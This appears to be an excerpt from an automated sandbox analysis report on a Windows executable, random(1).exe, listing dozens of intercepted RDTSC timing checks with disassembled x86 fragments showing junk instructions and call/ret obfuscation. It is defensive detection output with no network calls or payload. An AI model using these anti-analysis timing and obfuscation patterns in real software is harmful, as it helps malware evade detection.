              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1087E35 second address: 1087EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F06D8518548h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jmp 00007F06D851854Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F06D8518548h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 and edi, 62C285E4h 0x0000004d xchg eax, ebx 0x0000004e jmp 00007F06D851854Fh 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jne 00007F06D8518546h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1088E3A second address: 1088EC8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F06D8B4D9C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F06D8B4D9E3h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F06D8B4D9C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e adc si, 1BB0h 0x00000033 push 00000000h 0x00000035 cld 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F06D8B4D9C8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 xchg eax, ebx 0x00000053 jp 00007F06D8B4D9D2h 0x00000059 js 00007F06D8B4D9CCh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1088670 second address: 1088675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1089860 second address: 10898E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F06D8B4D9C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+122D1E95h], esi 0x0000002d mov dword ptr [ebp+122D577Ah], eax 0x00000033 push 00000000h 0x00000035 pushad 0x00000036 movzx eax, di 0x00000039 or ecx, dword ptr [ebp+122D2947h] 0x0000003f popad 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F06D8B4D9C8h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c push edi 0x0000005d mov dword ptr [ebp+122D3799h], eax 0x00000063 pop edi 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jne 00007F06D8B4D9C6h 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108B2D2 second address: 108B2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108B2DA second address: 108B2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108B879 second address: 108B8FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F06D8518548h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3880h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F06D8518548h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 or dword ptr [ebp+122D3780h], edx 0x0000004e jo 00007F06D851854Ch 0x00000054 mov dword ptr [ebp+122D1772h], edi 0x0000005a push 00000000h 0x0000005c mov edi, dword ptr [ebp+122D25D5h] 0x00000062 xchg eax, ebx 0x00000063 push esi 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108B8FC second address: 108B930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007F06D8B4D9C6h 0x00000015 jmp 00007F06D8B4D9D0h 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108CF39 second address: 108CF3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108CF3F second address: 108CFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F06D8B4D9C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov di, dx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F06D8B4D9C8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e pushad 0x0000002f and eax, dword ptr [ebp+122D29F3h] 0x00000035 cmc 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F06D8B4D9C8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 or esi, 3A5567D4h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ebx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108CC96 second address: 108CC9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108CC9B second address: 108CCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1091727 second address: 109172B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1091D1C second address: 1091D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092D36 second address: 1092D49 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F06D8518548h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092D49 second address: 1092D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092D4D second address: 1092D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092D53 second address: 1092D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1091F3F second address: 1091F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F06D8518557h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1099722 second address: 109972C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109972C second address: 1099732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1099732 second address: 1099736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1092F04 second address: 1092F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1099736 second address: 1099743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1096897 second address: 109689D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109689D second address: 10968DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F06D8B4D9D9h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F06D8B4D9D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10968DA second address: 10968DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1093FF2 second address: 1093FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1093FF8 second address: 1093FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1093FFC second address: 109400D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B7AC second address: 109B7B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D851854Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B7B6 second address: 109B825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F06D8B4D9C8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 clc 0x00000024 mov dword ptr [ebp+122D2043h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F06D8B4D9C8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov dword ptr [ebp+12463B99h], ecx 0x0000004c add bx, BFA7h 0x00000051 mov ebx, dword ptr [ebp+122D215Ah] 0x00000057 push 00000000h 0x00000059 add bx, E144h 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jnp 00007F06D8B4D9C6h 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B825 second address: 109B829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B829 second address: 109B82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1098952 second address: 109895C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F06D8518546h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109A8B5 second address: 109A8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109B997 second address: 109B99D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109D827 second address: 109D848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jns 00007F06D8B4D9D4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109D848 second address: 109D84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109CA6D second address: 109CA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109CB7F second address: 109CB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 109EBAD second address: 109EBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F06D8B4D9C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A1818 second address: 10A181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A181C second address: 10A1822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A0949 second address: 10A09E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F06D8518558h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F06D8518548h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 add dword ptr [ebp+122D3672h], edx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movzx edi, di 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push esi 0x0000003f mov ebx, 2615F3AEh 0x00000044 pop edi 0x00000045 mov eax, dword ptr [ebp+122D05E9h] 0x0000004b mov dword ptr [ebp+122D38A3h], ebx 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F06D8518548h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 00000015h 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d add bh, 00000055h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jno 00007F06D851854Ch 0x00000079 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A1AD3 second address: 10A1AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10A2A4A second address: 10A2A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF37 second address: 104BF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF3B second address: 104BF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 jbe 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF50 second address: 104BF56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF56 second address: 104BF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F06D8518546h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF60 second address: 104BF64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF64 second address: 104BF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F06D8518553h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 104BF86 second address: 104BF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1041BF5 second address: 1041BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10AA679 second address: 10AA688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10AA688 second address: 10AA69B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 jp 00007F06D8518546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10AAB6B second address: 10AAB6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B2450 second address: 10B2458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B2458 second address: 10B2487 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007F06D8B4D9CDh 0x00000013 pop eax 0x00000014 push edi 0x00000015 jl 00007F06D8B4D9C6h 0x0000001b pop edi 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B2487 second address: 10B24A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B24A7 second address: 10B24AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B24AB second address: 10B24D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jng 00007F06D8518561h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F06D8518553h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B7785 second address: 10B77A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F06D8B4D9D9h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B640E second address: 10B6418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B6418 second address: 10B6447 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F06D8B4D9E0h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F06D8B4D9D8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B6447 second address: 10B644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B644B second address: 10B644F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B644F second address: 10B6455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B6DC8 second address: 10B6DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B6F14 second address: 10B6F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B6F1E second address: 10B6F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06D8B4D9C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B6F28 second address: 10B6F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F06D8518559h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06D8518556h 0x00000018 jp 00007F06D8518546h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B724F second address: 10B725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B725D second address: 10B7282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F06D8518546h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F06D8518554h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B7282 second address: 10B7288 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B7288 second address: 10B72A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06D8518550h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
